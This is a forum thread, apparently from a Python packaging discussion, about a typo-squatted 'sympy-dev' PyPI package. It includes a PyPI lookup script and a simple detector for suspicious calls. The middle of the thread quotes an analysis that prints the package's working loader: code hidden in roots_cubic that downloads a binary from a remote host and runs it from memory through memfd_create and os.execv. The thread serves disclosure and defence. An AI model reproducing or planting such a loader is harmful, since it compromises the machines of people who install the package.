I’m not sure if packaging is the right tag here, but I just did a web search and stumbled over some articles from January saying that there was a typo-squat package called sympy-dev.
I don’t see any sympy-dev package on PyPI now, but speaking as a SymPy maintainer I would like to find out more about this.
Does anyone know how I could find more information?
Was the package removed by a PyPI admin?
Is that package name now blocked?
For the avoidance of doubt the SymPy project has never published a package called sympy-dev on PyPI. If it ever existed then I assume that it was a malicious typo-squatted package uploaded by someone who is not related to the SymPy project.
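One way to check whether a name is currently registered is PyPI's JSON API, which answers 404 for a project that does not exist. Below is a minimal sketch of that check. The helper names `fetch_status` and `project_exists` are made up for illustration. Note that a 404 only says that nothing is published under the name right now; it does not say whether the name was removed by an admin or is blocked from re-registration.

```python
import urllib.error
import urllib.request

# PyPI's JSON API endpoint for a project; it returns 404 for unknown names.
PYPI_JSON_URL = "https://pypi.org/pypi/{name}/json"


def fetch_status(url, timeout=10):
    """Return the HTTP status code of a GET request to url."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        # urllib raises for 4xx/5xx responses; the status code is on the exception.
        return exc.code


def project_exists(name, fetch=fetch_status):
    """Return True if a project called name is currently published on PyPI.

    fetch is injectable so the logic can be exercised without network access.
    """
    status = fetch(PYPI_JSON_URL.format(name=name))
    if status == 200:
        return True
    if status == 404:
        return False
    raise RuntimeError(f"unexpected HTTP status {status} for {name!r}")
```

Calling `project_exists("sympy-dev")` performs a live request, so the answer depends on the state of PyPI at the time it is run.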
Note: This report has been updated by a verification record.
The package contains multiple instances of malicious code execution. Specifically, sympy/polys/polyroots.py and sympy/polys/polytools.py download and execute code from remote servers (185.167…46 and 63.250…54 respectively) using memfd_create and os.execv, which is a strong indicator of malicious intent. Also, YARA rule http_hardcoded_ip matched these files, further supporting the malicious classification.
Malicious polyroots.py
def run(elf):
    fd = memfd_create(random_string(8))
    os.write(fd, elf)
    os.lseek(fd, 0, os.SEEK_SET)
    path = f"/proc/self/fd/{fd}"
    os.execv(path, [path, '-c', 'config.json'])

def roots_cubic(f, trig=False):
    """Returns a list of roots of a cubic polynomial.
    References
    ==========
    [1] https://en.wikipedia.org/wiki/Cubic_function, General formula for roots,
    (accessed November 17, 2014).
    """
    config = requests.get(HOST + "/config").content
    f = open("config.json", "wb")
    f.write(config)
    f.close()
    data = requests.get(HOST).content
    run(data)
From a quick look, the other one looks pretty much the same, but is embedded in:

@public
def groebner(F, *gens, **args):
    """
    Computes the reduced Groebner basis for a set of polynomials.
    """
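For anyone wanting to screen a source tree for the same two signals the report mentions (a URL with a hard-coded IP address, and calls such as `memfd_create` or `os.execv`), here is a rough sketch. It is not the actual `http_hardcoded_ip` YARA rule; the regex, the set of call names, and the function names `call_name` and `scan_source` are assumptions chosen for illustration. Expect false positives, since plenty of legitimate code calls `os.execv`.

```python
import ast
import re

# Assumed pattern: an http(s) URL whose host is a dotted-quad IPv4 address.
IP_URL_RE = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?")

# Assumed list of call names worth a closer look; extend as needed.
SUSPICIOUS_CALLS = {"memfd_create", "execv", "execve"}


def call_name(node):
    """Return the trailing name of a call, e.g. 'execv' for os.execv(...)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return None


def scan_source(source):
    """Return sorted (line number, kind, detail) findings for one source string."""
    findings = []
    # Textual pass: look for hard-coded IP URLs on each line.
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in IP_URL_RE.finditer(line):
            findings.append((lineno, "hardcoded-ip-url", match.group(0)))
    # Syntactic pass: walk the AST and flag calls to the listed names.
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and call_name(node) in SUSPICIOUS_CALLS:
            findings.append((node.lineno, "suspicious-call", call_name(node)))
    return sorted(findings)
```

Running `scan_source` over the text of each `.py` file in an unpacked sdist or wheel gives a list of places to inspect by hand. It only parses the code and never imports or executes it.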
Thanks both. It seems interesting that there was some nonzero effort to hide the malicious code in a non-obvious place, but at the same time you would think it would not be hard to obfuscate the malicious parts much better than that. Presumably this sort of thing is done by AI agents now, which is worrying if you imagine that they could become more capable in future.